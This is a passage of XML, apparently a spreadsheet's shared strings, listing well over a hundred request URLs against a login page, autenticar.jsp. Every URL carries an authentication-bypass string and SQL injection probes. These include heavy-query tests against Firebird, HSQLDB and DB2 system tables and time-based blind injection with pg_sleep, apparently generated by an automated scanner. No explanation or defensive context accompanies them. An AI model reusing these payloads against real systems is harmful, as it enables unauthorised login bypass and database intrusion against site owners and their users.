    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((("uwhz"="uwhz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and"deoi"="deoi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and("ptlg"like"ptlg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(("ahhh"like"ahhh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((("rlvu"like"rlvu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7138=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and"bayo"like"bayo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(3380=3380</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((5956=5956</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(((5761=5761</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and('jdxl'='jdxl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(('nsqn'='nsqn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((('ptdt'='ptdt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and'yzna'='yzna</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and('faqn'like'faqn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(('xlhe'like'xlhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((('cjyg'like'cjyg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and'ayxn'like'ayxn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and("szom"="szom</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(("hbzs"="hbzs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((("spoc"="spoc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and"depv"="depv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and("mhmm"like"mhmm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(("mvsb"like"mvsb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((("ofvr"like"ofvr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7216=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and"wquh"like"wquh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(6542=6542</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((6467=6467</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(((6067=6067</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and('saqe'='saqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(('csnt'='csnt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((('rbxy'='rbxy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and'mjtr'='mjtr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and('uefi'like'uefi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(('bgpu'like'bgpu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((('tgmv'like'tgmv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and'aogk'like'aogk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and("bchn"="bchn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(("ogbv"="ogbv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((("giyp"="giyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and"odpd"="odpd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and("guvh"like"guvh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(("qzzy"like"qzzy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((("mdko"like"mdko</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7652=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and"tnpu"like"tnpu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(6969=6969</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((7321=7321</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(((6604=6604</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and('roko'='roko</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(('bjyw'='bjyw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((('xxnf'='xxnf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and'qpyg'='qpyg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and('flmu'like'flmu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(('nwyf'like'nwyf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((('ptmu'like'ptmu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and'vyiy'like'vyiy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and("iapd"="iapd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(("wxor"="wxor</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((("nvil"="nvil</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and"gabp"="gabp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and("znxv"like"znxv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(("rqkm"like"rqkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((("mahm"like"mahm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3016=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and"vuag"like"vuag</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(9499=9499</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((9384=9384</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(((4451=4451</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and('jpcc'='jpcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(('qhfd'='qhfd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((('deya'='deya</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and'uonh'='uonh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and('eowe'like'eowe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(('ajyl'like'ajyl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((('vjeq'like'vjeq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and'jlas'like'jlas</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and("vgez"="vgez</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(("zlrc"="zlrc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((("oawd"="oawd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and"dajl"="dajl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and("ojql"like"ojql</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(("okbb"like"okbb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((("jhbi"like"jhbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5231=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and"ldal"like"ldal</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-50</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2617)or6644=(select6644frompg_sleep(5))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1042</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7826')or6644=(select6644frompg_sleep(5))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5716</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2131'or6644=(select6644frompg_sleep(5))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3843</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4299"or6644=(select6644frompg_sleep(5))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9416</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4320)or6644=(select6644frompg_sleep(5))and(5638=5638</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-669</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-120))or6644=(select6644frompg_sleep(5))and((1265=1265</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5117</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4382)))or6644=(select6644frompg_sleep(5))and(((1727=1727</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9032</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7591or6644=(select6644frompg_sleep(5))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3648</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9379')or6644=(select6644frompg_sleep(5))and('ckuk'='ckuk</t>
  </si>
  <si>
